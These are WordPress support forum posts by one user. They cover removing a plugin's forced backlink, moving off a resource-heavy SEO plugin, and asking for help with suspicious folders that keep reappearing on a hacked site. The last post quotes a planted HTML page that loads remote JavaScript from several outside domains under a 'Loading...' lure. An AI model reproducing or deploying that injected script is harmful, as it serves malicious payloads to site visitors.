oh, and by the way, in the latest version of the plugin, there is no “function promo()”.. just search for something like a “function debug” and delete the url (or, make a search for all text line containing a “.com” and delete those)… in fact, you can delete the entire line including the “echo”…
wow, that explanation from Joost reminds me of a movie i saw lately; “As lame As it Gets” ??
I agree its a good plugin, very useful, and I use it, but that doesn’t mean I have to put up with providing him a free backlink just like that. Its not like his is the best wordpress plugin in the world… And if it were, Joost, you are more than welcome to charge for it… But don’t come in here with all this attitude saying you will NEVER provide an option to remove it. Here’s some news for you- NOBODY CARES! we’ll simply edit that link out…
Anyone using this plugin, please get it removed using the process mentioned above, you are simply throwing away your Link PR juice by keeping that line in there….
I was looking to use Greg’s plugin but with the kind of support and his off-handed replies, i guess i better not… yes i know he is providing a plugin free of cost, but it doesn’t cost to just respond in a single line rather than redirecting everyone to his own blog only to find there are no answers!
Looking forward to the same info. I need to get rid of AIOSEO as my host reports it uses a lot of CPU resources. But I do not want to lose out on the hundred’s of posts with metadata that has been indexed in google.

Forum: Fixing WordPress
In reply to: Possible malicious files found on my siteHi,
to update further, i jut noticed there are several folders in my website root with fishy sounding names like “7nBsMT35”, “11QBn104”, “ER62VJ6h”, “SJkDMFus” etc.
I know there are not Wp files, so I tried deleting them but the seem to come right back again. Howz that happening? For the time being I deleted the contents of those folders and changed chmod permissions to 700. Hope that helps. A sample content on one o the files inside one such folder is:
<html> <h1>WAIT PLEASE</h1> <h3>Loading...</h3> <script type="text/javascript" src="https://labarberia.com/j3hSNvAK/js.js"></script> <script type="text/javascript" src="https://ftp.nevykelis.lt/ighjzWzW/js.js"></script> <script type="text/javascript" src="https://onart.ro/3ji7nGi6/js.js"></script> <script type="text/javascript" src="https://pienparfume.com.tr/Sx2x2nJ3/js.js"></script> <script type="text/javascript" src="https://ftp1.commscon.it/s5xU3kVU/js.js"></script> </html>
How do you suggest i get rid of this issue? My site: https://phonearenaindia.com
